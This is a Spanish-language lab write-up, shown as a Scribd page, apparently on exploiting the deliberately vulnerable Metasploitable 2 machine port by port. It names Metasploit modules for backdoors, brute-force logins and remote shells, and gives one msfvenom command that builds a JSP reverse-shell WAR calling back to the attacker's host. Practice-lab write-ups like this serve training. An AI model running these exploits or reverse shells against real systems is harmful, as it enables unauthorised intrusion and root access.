0% encontró este documento útil (0 votos)
9 vistas16 páginas

Explotación de Puertos en Metasploitable 2

Writeup of machine Metasploitable 2

Cargado por

feer24899cr
Derechos de autor
© All Rights Reserved
Nos tomamos en serio los derechos de los contenidos. Si sospechas que se trata de tu contenido, reclámalo aquí.
Formatos disponibles
Descarga como PDF, TXT o lee en línea desde Scribd
0% encontró este documento útil (0 votos)
9 vistas16 páginas

Explotación de Puertos en Metasploitable 2

Writeup of machine Metasploitable 2

Cargado por

feer24899cr
Derechos de autor
© All Rights Reserved
Nos tomamos en serio los derechos de los contenidos. Si sospechas que se trata de tu contenido, reclámalo aquí.
Formatos disponibles
Descarga como PDF, TXT o lee en línea desde Scribd

Máquina Metasploitable 2

Puerto 21 (FTP):

Para este puerto nos encontramos que tiene activado el ftp Anonymous login, y si nos
fijamos en su versión tiene la vsftpd 2.3.4 la cual es vulnerable.

Podemos usar el módulo de metasploit unix/ftp/vsftpd_234_backdoor.

Configuramos el RHOSTS con la IP de la máquina víctima y ejecutamos el comando run


o exploit. De esta manera obtenemos una shell como root.
Puerto 22 (SSH):

Podemos encontrar usuarios validos usando los scripts de nmap, para ello ejecutamos
el siguiente comando:
Esto mismo se puede realizar desde msfconsole con scanner/ssh/ssh_login

Debemos configurar, el RHOSTS, el VERBOSE, el PASS_FILE y el USER_FILE, una vez


configurado estos parámetros, ejecutamos el exploit.

Puerto 2121 (PROFTPD)


Vamos a usar también msfconsole y en este caso el payload (scanner/ftp/ftp_login)

Configuramos, el RHOSTS, el RPORT lo ponemos en 2121, ponemos el USER_FILE y el


PASS_FILE, el USER_AS_PASS lo ponemos en true, y ejecutamos el exploit.

Puerto 23 (TELNET):

Usamos el siguiente payload scanner/telnet/telnet_login y lo configuramos.

Una vez configurado lanzamos el exploit.


Podemos capturar el tráfico con wireshark y vemos lo siguiente:
Vemos la contraseña introducida en texto claro.

Puerto 25 (SMTP):

Para este caso utilizaremos el siguiente payload para enumerarlo


scanner/smtp/smtp_enum

Solo debemos configurar el RHOSTS y el USER_FILE

Puerto 3306 (Mysql):


Usaremos el siguiente payload scanner/mysql/mysql_login

Sin embargo, me da este error

Puerto 80 (http):

Al entrar en la página vemos ya por defecto credenciales en texto claro.


Si vemos la versión de http con este payload scanner/http/http_version

Vemos que la versión es Powered by PHP/5.2.4-2ubuntu5.10

Usaremos este payload exploit/multi/http/php_cgi_arg_injection

Configuramos el RHOSTS y ejecutamos el exploit, con esto obtenemos una sesión de


meterpreter.
Puerto 8009-8180 (TOMCAT)

Para explotar el TOMCAT y obtener acceso, usaremos el siguiente payload.

En este caso hice la explotación de forma manual, ya que con metasploit he tenido
problemas.

Primero entramos en tomcat mánager con las credenciales tomcat/tomcat

En mi caso he usado este payload msfvenom -p java/jsp_shell_reverse_tcp LHOST=”Ip


maquina atacante” LPORT=”Puerto de escucha” -f war > [Link]

Una vez generado el payload, toca subirlo en tomcat mánager.


Hacemos click en browse donde pone Select WAR file to upload.

Una vez subido nos ponemos en escucha con netcat por el puerto 443 y hacemos click
en /reverse.

Puerto 6667 (Unreal IRC)


Para explotar esta vulnerabilidad usamos el siguiente exploit en metasploit.

unix/irc/unreal_ircd_3281_backdoor)

Lo configuramos, y lo ejecutamos obteniendo la shell.

Puerto 6000 (X11):

Para realizar un escaneo de esta vulnerabilidad con metasploit usaremos este payload

scanner/x11/open_x11

En este caso nos sale Access Denied.


Puertos 512,513,514 (Rlogin):

Con esta vulnerabilidad podemos comunicarnos remotamente desde cualquier


máquina, logeandonos como root.

Puerto 5900 (VNC):

Para explotar la vulnerabilidad de este puerto usaremos el siguiente payload en


metasploit.

scanner/vnc/vnc_login

Obtenemos como contraseña password, ejecutamos el comando vncviewer seguido


de la ip de la maquina víctima, e introducimos esa contraseña.
De esta manera obtenemos una consola como root.

Puerto 3632 (Distcc):

Para este puerto vamos a utilizar este payload.

unix/misc/distcc_exec

Una vez cargado este exploit, configuramos el RHOSTS

También debemos cambiar el tipo de payload a este otro.

cmd/unix/reverse

Ejecutamos el comando run y obtenemos la shell.


Puerto 1524 (ingreslock):

Gracias a esta vulnerabilidad nos podemos conectar directamente con root mediante
netcat.

Puerto 139,445 (Samba):


Para estos puertos usaremos el siguiente exploit:

multi/samba/usermap_script

Configuramos el RHOSTS y ejecutamos el comando run.

Obtenemos una shell como root.

También podría gustarte